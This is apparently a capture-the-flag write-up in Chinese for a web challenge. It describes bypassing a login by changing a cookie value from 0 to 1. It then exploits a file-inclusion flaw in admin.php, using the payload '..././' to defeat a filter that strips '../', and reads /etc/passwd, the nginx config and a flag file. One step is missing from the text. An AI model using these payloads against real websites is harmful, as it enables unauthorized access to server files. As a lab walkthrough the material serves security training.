打開鏈接彈出提示登錄框
隨便輸入登錄名和密碼,提示網站建設中
查看cookie有個login,值為0,將0改為1后在訪問首頁
點擊Manage發現url有/manages/admin.php?module=index&name=php,於是想到了文件包含,
輸入/manages/admin.php?module=ind../ex&name=php發現可以正常訪問於是猜想../被替換為空,所以將../改為..././於是訪問/manages/admin.php?module=..././..././..././etc/passwd&name=
查看nginx配置文件/etc/nginx/nginx.conf
發現site-enabled/dedault,查看發現存在目錄遍歷
於是
得到flag.php
<?php $flag='flag{22ec4850-ed2e-460b-b193-99c950faedb6}';echo 'flag_is_here';